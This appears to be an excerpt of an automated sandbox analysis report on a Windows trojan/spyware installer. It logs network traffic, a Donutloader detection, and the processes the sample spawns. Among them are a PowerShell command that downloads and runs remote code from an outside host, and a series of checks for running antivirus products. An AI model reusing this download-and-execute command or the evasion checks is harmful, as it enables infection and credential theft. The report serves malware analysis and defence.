          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: https://sectigo.com/CPS0D
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: https://ssl.trustwave.com/CA03
          Source: setup.exe, 00000000.00000003.1829977664.0000000003704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: setup.exe, 00000000.00000003.1830105452.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841442094.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829977664.0000000003702000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841764761.00000000036B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: setup.exe, 00000000.00000003.1830105452.0000000003691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: setup.exe, 00000000.00000003.1830105452.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841442094.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829977664.0000000003702000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841764761.00000000036B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: setup.exe, 00000000.00000003.1830105452.0000000003691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: https://www.certum.pl/CPS0
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2075890487.000000000336F000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2085146266.000000007F31B000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000000.2092228828.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000000.2112064936.0000000000E7D000.00000020.00000001.01000000.0000000C.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drString found in binary or memory: https://www.innosetup.com/
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: setup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2075890487.000000000336F000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe, 00000006.00000003.2085146266.000000007F31B000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000000.2092228828.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000000.2112064936.0000000000E7D000.00000020.00000001.01000000.0000000C.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drString found in binary or memory: https://www.remobjects.com/ps
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49746 version: TLS 1.2

          System Summary

          Source: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00800770 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_00800770
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp 8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
          Source: C:\Users\user\Desktop\setup.exeCode function: String function: 007B987D appears 70 times
          Source: C:\Users\user\Desktop\setup.exeCode function: String function: 007C625D appears 61 times
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.6.drStatic PE information: Number of sections : 11 > 10
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drStatic PE information: Number of sections : 11 > 10
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drStatic PE information: Number of sections : 11 > 10
          Source: setup.exe, 00000000.00000003.1806627844.00000000029C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WM/OriginalFilename vs setup.exe
          Source: setup.exe, 00000000.00000000.1654419855.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: WM/OriginalFilename vs setup.exe
          Source: setup.exe, 00000000.00000003.2013104825.0000000003CC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs setup.exe
          Source: setup.exeBinary or memory string: WM/OriginalFilename vs setup.exe
          Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/15@4/3
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B0AC0 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_007B0AC0
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4420:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
          Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
          Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
          Source: setup.exe, 00000000.00000003.1841620339.0000000003677000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829599046.0000000003695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exe
          Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp "C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$902A0,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp "C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$90262,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
          Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
          Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll, acgenral.dll, uxtheme.dll, winmm.dll, samcli.dll, msacm32.dll, version.dll, userenv.dll, dwmapi.dll, urlmon.dll, mpr.dll, sspicli.dll, winmmbase.dll, iertutil.dll, srvcli.dll, netutils.dll, wininet.dll, mscoree.dll, windows.storage.dll, wldp.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, dpapi.dll, kernel.appcore.dll, wbemcomn.dll, amsi.dll, profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, kdscli.dll, ncrypt.dll, ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe Section loaded: uxtheme.dll, apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Section loaded: mpr.dll, version.dll, winhttp.dll, uxtheme.dll, kernel.appcore.dll, wtsapi32.dll, winsta.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe Section loaded: uxtheme.dll, apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Section loaded: mpr.dll, version.dll, winhttp.dll, uxtheme.dll, kernel.appcore.dll, wtsapi32.dll, winsta.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, textshaping.dll, windows.storage.dll, wldp.dll, sspicli.dll, dwmapi.dll, sfc.dll, sfc_os.dll, explorerframe.dll, propsys.dll, apphelp.dll, dlnashext.dll, wpdshext.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
